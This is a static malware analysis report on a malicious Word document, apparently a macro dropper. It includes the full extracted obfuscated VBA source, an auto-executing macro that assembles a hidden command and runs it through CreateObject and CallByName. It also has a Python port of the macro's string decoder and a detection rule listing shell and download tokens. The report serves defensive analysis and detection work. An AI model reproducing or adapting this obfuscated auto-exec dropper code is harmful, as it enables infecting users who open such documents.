Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7b718e92b365e9ec…

MALICIOUS

Office (OLE)

Size: 69.0 KB
Created: 2018-06-07 09:44:00
Authoring application: Microsoft Office Word
First seen: 2021-08-20
MD5: 22f131fd02ccd69d48d9ef9dde51bcef
SHA-1: fa6d4a5e5a37f0e6e2a8edb33f985842298b1b7f
SHA-256: 7b718e92b365e9ec72ff107d47e29bb9eaacca5e0dfb63a6f7a2cef4a9ac53a9
Risk score: 250

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1071.001 Web Protocols

The sample is a Word document carrying a VBA project. The document body instructs the user to 'Enable Edit' and 'Enable Content', the standard lure for getting a macro past Protected View and the macro security prompt. The entry point is `Sub AutOOpen()`; VBA identifiers are case-insensitive, so Word runs it as AutoOpen when the document is opened. Control flow is deliberately indirect: AutoOpen calls `digital988`, which writes a value into the UserForm control `unicorn233.russellnss`; that control's `_Change` handler assembles a command string and writes it into a second control, `lucybond.Vudmond`, whose `_Change` handler calls `CreateObject` on a decoded class name and then, via `CallByName` with `VbMethod`, invokes a decoded three-character method on the resulting object with the assembled string, `0` and `True` as arguments. Every meaningful string (COM class name, method name, command fragments) is kept either in UserForm control properties or in literals such as `".]hQ]ccg;wha[im]/lEmaQRhumE.]/"` and is decoded at runtime by `DAVILLE7`, which maps each character to the one four positions earlier in a 90-character alphabet read from `unicorn233.slapdays`. That alphabet lives in the form's storage, not in the extracted VBA source, so the decoded values cannot be recovered from this report alone; the (string, 0, True) argument shape is consistent with a hidden, blocking `WScript.Shell.Run`, but that is an inference, not a decoded value. The repeated `studerag`/`lourdose` arithmetic scattered through the modules is dead filler. ClamAV identifies the file as 'Doc.Dropper.Agent-6576001-0'; together the indicators point to a dropper that downloads and executes a second-stage payload, although the exact command is obfuscated. Two caveats on the heuristics below: the 'Legacy WordBasic auto-exec macro marker' finding assumes no VBA project was recovered, which is not the case here, so it adds nothing beyond the AutoOpen detection; and the extracted URLs are OOXML schema namespace URIs from the document body, not network indicators.

Heuristics 9

  • ClamAV: Doc.Dropper.Agent-6576001-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6576001-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set mpegjoshua = CreateObject(vityushka)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    CallByName vs052505, DAVILLE7(dossoccer), VbMethod, lucybond.Vudmond, avorithS, aposacho
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutOOpen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)
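The co-occurrence rule described under OLE_VBA_PCODE_AUTOEXEC_EXEC above, written out as an added Python example (this is not the analysis platform's own implementation). It takes the decompressed text of one VBA source or cache stream, matches the two token lists from the heuristic description case-insensitively, so this sample's mixed-case `AutOOpen` still counts as AutoOpen, and fires only when both classes are present. The sample stream is constructed here by joining two lines from the extracted source as if they came from one stream; the real check runs over the decompressed stream bytes.

```python
"""Added example: the OLE_VBA_PCODE_AUTOEXEC_EXEC co-occurrence rule as
described in the heuristic text.  Not the analysis platform's own code.
Input is the decompressed text of a single VBA source or cache stream; the
rule fires only when an auto-exec entry point AND a shell/download/object-
execution token both appear in that stream.
"""
import re

# Token lists copied from the heuristic description on this page.
AUTOEXEC_TOKENS = ["Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose"]
EXEC_TOKENS = ["Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro"]

_IDENT = r"[A-Za-z0-9_]"


def find_tokens(stream: str, tokens) -> set:
    """Case-insensitive, whole-identifier match.

    VBA identifiers are case-insensitive, so 'Sub AutOOpen()' in this sample
    must still count as AutoOpen.  The lookarounds stop 'Shell' matching
    inside 'ShellExecute' or 'PowerShell' while still matching
    'WScript.Shell' (preceded by a dot, which is not an identifier char)."""
    found = set()
    for tok in tokens:
        pattern = r"(?<!" + _IDENT + ")" + re.escape(tok) + r"(?!" + _IDENT + ")"
        if re.search(pattern, stream, re.IGNORECASE):
            found.add(tok)
    return found


def flag_autoexec_exec(stream: str):
    """Return (autoexec_tokens, exec_tokens) when both classes co-occur in
    the stream, else None.  Neither class alone is enough to fire."""
    auto = find_tokens(stream, AUTOEXEC_TOKENS)
    execs = find_tokens(stream, EXEC_TOKENS)
    if auto and execs:
        return sorted(auto), sorted(execs)
    return None


# Constructed test input: two lines taken from this sample's extracted
# source and joined as if they had come from the same stream.
SAMPLE_STREAM = ("Sub AutOOpen()\nstuderag = 67 - 58\nEnd Sub\n"
                 "Set mpegjoshua = CreateObject(vityushka)\n")

if __name__ == "__main__":
    print(flag_autoexec_exec(SAMPLE_STREAM))
    print(flag_autoexec_exec("Sub AutoOpen()\nEnd Sub\n"))  # None: no exec token
```

Because the rule needs both token classes in the same stream, a sample that splits the entry point and the execution call across modules, as this one does (`AutOOpen` in ThisDocument, `CreateObject` in the `lucybond` form), is caught only where the compiled or cached stream happens to carry both; that is why the source-level OLE_VBA_AUTOOPEN and OLE_VBA_CREATEOBJ findings remain useful alongside it.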

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7855 bytes
SHA-256: eae231d460f5357c94d5e5389c1a98da1401d736b31d09dd845f6b4b2dba8005
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutOOpen()
studerag = 67 - 58
digital988
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
End Sub

Attribute VB_Name = "ANIHAVILAZ2"
Attribute VB_Base = "0{EF16E284-5CAF-44A2-A738-A5DCA4939946}{34C9F1E1-D62A-40AF-AC69-B509B668ED99}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "lucybond"
Attribute VB_Base = "0{9CE1AA7D-7AF2-4D75-AAB0-6FEC926D4B7D}{D60FB3D3-3EBA-4BCA-A2FE-2274598A1967}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub AVEHSDALM_Change()

End Sub

Private Sub brbnf1993_Change()

End Sub

Private Sub carlpsycho_Change()

End Sub

Private Sub KUHCNILES_Change()

End Sub

Private Sub REHCATSIO_Change()

End Sub

Private Sub Vudmond_Change()
Set mpegjoshua = CreateObject(vityushka)
lourdose = 8 - 20
lourdose = 12 * lourdos
lourdose = lourdose - 36 - lourdose * lourdos
lourdose = 68 - 11 - 63 - lourdose * 6
az673080 mpegjoshua
End Sub

Attribute VB_Name = "thpskoda"
Attribute VB_Base = "0{13C0BFEB-9CE4-445E-81DD-544CFB62B49F}{281A5203-C989-4D7D-9977-3655ABCF5DD1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "unicorn233"
Attribute VB_Base = "0{B8204855-D961-4C08-A568-FB2B2B64DB45}{300735BB-3777-4A5F-B57C-BD16B222E9A7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub russellnss_Change()
cinemacinema = VOKINDEBO(ri654321)
craplist = VOKINDEBO(ri654321)
angelgrl = VOKINDEBO(drilhunc)
trypspla = VOKINDEBO(drilhunc)
ANIDAYRBA = 21 + 34
ANIDAYRBA = 73 * ANIDAYRBA * 5
ANIDAYRBA = 40 - 81 * 85 + 56 - 5
ANIDAYRBA = 55 - 72 + ANIDAYRB
ANIDAYRBA = 38 + 91 * 39 + 57 - 4
olivermac cinemacinema, craplist, angelgrl, trypspla
End Sub

Attribute VB_Name = "antirace"
Function flicumbn()
flicumbn = ".]hQ]ccg;wha[im]/lEmaQRhumE.]/"
End Function

Function ri654321()
ri654321 = ANIHAVILAZ2.avolahcilo
End Function

Function drilhunc()
drilhunc = lucybond.brbnf1993
End Function

Function DAVILLE7(asdfghsen)
padshi13 = ""
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
future1972 = Len(asdfghsen)
For imurik46 = 1 To future1972
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
padshi13 = padshi13 + james889(GNIGNAHC(asdfghsen, imurik46), 4)
Next imurik46
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
DAVILLE7 = padshi13
End Function

Function martin1971()
martin1971 = unicorn233.slapdays
End Function


Attribute VB_Name = "docradio"
Function teenocks()
teenocks = lucybond.AVEHSDALM
End Function

Function olivermac(server101, boogersony, ostinreason, vokzirga)
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
lucybond.Vudmond = avoknepolh(server101, boogersony) + hei666888(server101, ostinreason) + rhODin80(vokzirga)
End Function

Function ariadna()
ariadna = "h[/igplia[shEmaQRhumE.]/"
End Function

Function VOKINDEBO(quamiasi)
bloonlet = AVOMUSAYM(9, 4) - 1
esschoki9 = AVOMUSAYM(53, 1)
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
sbdclennon = GNIGNAHC(onereefer, esschoki9)
For karamuck = 2 To bloonlet
esschoki9 = AVOMUSAYM(27, 1)
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
sbdclennon = sbdclennon + GNIGNAHC(quamiasi, esschoki9)
Next karamuck
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
esschoki9 = AVOMUSAYM(37, 1)
VOKINDEBO = royalsmom(sbdclennon, esschoki9)
End Function

Function royalsmom(bastgurt, NILRAHCAK)
royalsmom = bastgurt + GNIGNAHC(teenocks, NILRAHCAK)
End Function


Attribute VB_Name = "mudpie76"
Function james889(bripaseo As String, November1878 As Integer) As String
Dim xiong222 As Integer
xiong222 = 0
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
For lafrench = 1 To 90
If (GNIGNAHC(martin1971, lafrench) = bripaseo) Then
   xiong222 = lafrench
    Exit For
    studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
End If
Next lafrench
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
xiong222 = IIf(xiong222 - November1878 <= 0, 90 + xiong222 - November1878, xiong222 - November1878)
james889 = GNIGNAHC(martin1971, xiong222)
End Function

Function hei666888(dendalta, goldgarden)
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
hei666888 = DAVILLE7(thpskoda.CGFKMYSQ) + goldgarden + DAVILLE7(thpskoda.asdfword97) + _
goldgarden + DAVILLE7(thpskoda.mayzylci) + dendalta + _
DAVILLE7(ANIHAVILAZ2.folkthre + flicumbn + ANIHAVILAZ2.pnasty24) + dendalta + DAVILLE7(ANIHAVILAZ2.folkthre)
End Function

Sub az673080(vs052505)
dossoccer = "I[/"
avorithS = 0
aposacho = True
CallByName vs052505, DAVILLE7(dossoccer), VbMethod, lucybond.Vudmond, avorithS, aposacho
End Sub

Function GNIGNAHC(smilesrom, voknizirB)
justinrom = Left(smilesrom, voknizirB)
GNIGNAHC = izecubez(justinrom)
End Function

Function izecubez(neannium)
izecubez = Right(neannium, 1)
End Function


Attribute VB_Name = "Rolladen"
Function vityushka()
vityushka = paulpacers
End Function

Function paulpacers()
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
paulpacers = DAVILLE7(ANIHAVILAZ2.Simulate)
End Function

Function rhODin80(rafeliab)
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
rhODin80 = DAVILLE7(ariadna + ANIHAVILAZ2.OKNERAYLIM) + rafeliab + _
DAVILLE7(ANIHAVILAZ2.bitterb3) + rafeliab + DAVILLE7(unicorn233.bensongary)
End Function

Function avoknepolh(wallyfrank, oliveemily)
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
avoknepolh = DAVILLE7(lucybond.KUHCNILES) + wallyfrank + DAVILLE7(thpskoda.umnsones) + _
 oliveemily + DAVILLE7(lucybond.REHCATSIO + lucybond.carlpsycho) + oliveemily
End Function

Function onereefer()
onereefer = unicorn233.tempdiablo
End Function


Attribute VB_Name = "threnviz"
Function AVOMUSAYM(warykafc, mulbebpr)
AVOMUSAYM = juliatemp(Int((warykafc * jimbobshit()) + mulbebpr))
End Function

Function juliatemp(renhoek1)
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
juliatemp = CInt(renhoek1)
End Function

Sub digital988()
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
unicorn233.russellnss = "willie09"
End Sub

Function jimbobshit()
visamickey = 75 * 67
visamickey = 21 * 17 - 36 - 4
visamickey = visamickey + visamickey * 5
visamickey = visamickey - 64 * 18 + 4
jimbobshit = Rnd()
End Function
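The string decoder used throughout the extracted source (`DAVILLE7` calling `james889` and `GNIGNAHC`), ported to Python as an added example; this is not code from the sample or from the analysis platform. The 90-character alphabet the macro reads from the UserForm control `unicorn233.slapdays` is not part of the extracted VBA, so the block uses a constructed placeholder alphabet, plus an encoder that the sample does not have, to build round-trip test vectors and to show the not-found edge case. The sample's encoded literals are included unchanged; substituting the alphabet recovered from the form's storage for the placeholder is what decodes them.

```python
"""Port of the sample's string decoder: DAVILLE7 -> james889 -> GNIGNAHC.

Added example, not code from the sample.  Each character of an encoded
string is looked up (1-based) in a 90-character alphabet that the macro
reads from the UserForm control unicorn233.slapdays, then replaced by the
character four positions earlier in that alphabet, wrapping at the start.
The real alphabet is not in the extracted VBA, so PLACEHOLDER_ALPHABET is
a constructed stand-in used only to exercise the algorithm.
"""
import string

# Constructed placeholder: exactly 90 characters, the bound hard-coded in
# james889's "For lafrench = 1 To 90".  NOT the sample's real alphabet.
PLACEHOLDER_ALPHABET = string.ascii_letters + string.digits + "[]/;.:,!?@#$%&*()-_=+<>{}|~^"
assert len(PLACEHOLDER_ALPHABET) == 90

# Encoded literals copied verbatim from the extracted source.
SAMPLE_LITERALS = {
    "flicumbn": ".]hQ]ccg;wha[im]/lEmaQRhumE.]/",
    "ariadna": "h[/igplia[shEmaQRhumE.]/",
    "dossoccer": "I[/",   # DAVILLE7(dossoccer) is the CallByName method name
}


def gnignahc(s: str, i: int) -> str:
    """GNIGNAHC(s, i) = Right(Left(s, i), 1): the i-th character, 1-based."""
    return s[:i][-1:]


def james889(ch: str, shift: int, alphabet: str) -> str:
    """Port of james889.

    VBA leaves the index at 0 when ch is not in the alphabet; 0 - shift <= 0
    then wraps to len - shift, so an unknown character silently decodes to
    alphabet[len - shift - 1] (0-based) instead of raising an error."""
    n = len(alphabet)
    idx = 0
    for pos in range(1, n + 1):
        if gnignahc(alphabet, pos) == ch:   # Option Compare Binary: case-sensitive
            idx = pos
            break
    idx -= shift
    if idx <= 0:                            # IIf(idx - shift <= 0, 90 + ..., ...)
        idx += n
    return gnignahc(alphabet, idx)


def daville7(encoded: str, alphabet: str, shift: int = 4) -> str:
    """Port of DAVILLE7: decode every character with james889(ch, 4)."""
    return "".join(james889(gnignahc(encoded, i), shift, alphabet)
                   for i in range(1, len(encoded) + 1))


def encode(plain: str, alphabet: str, shift: int = 4) -> str:
    """Inverse of daville7.  Not in the sample; used here to build test vectors."""
    n = len(alphabet)
    out = []
    for ch in plain:
        pos = alphabet.index(ch) + 1 + shift   # 1-based; raises if ch is unknown
        if pos > n:
            pos -= n
        out.append(alphabet[pos - 1])
    return "".join(out)


def decode_sample_literals(alphabet: str) -> dict:
    """Decode the sample's literals with the given alphabet.  Meaningful only
    once the real unicorn233.slapdays value has been recovered."""
    return {name: daville7(enc, alphabet) for name, enc in SAMPLE_LITERALS.items()}


if __name__ == "__main__":
    for name, value in decode_sample_literals(PLACEHOLDER_ALPHABET).items():
        print(f"{name}: {value!r}")
```

To recover the real alphabet, dump the `unicorn233` form's storage (the control values sit in the form's `o` stream rather than in the VBA source), locate the 90-character value bound to `slapdays`, and pass it as `alphabet`; the same routine then also decodes the class name held in `ANIHAVILAZ2.Simulate` and the command fragments held in the other controls.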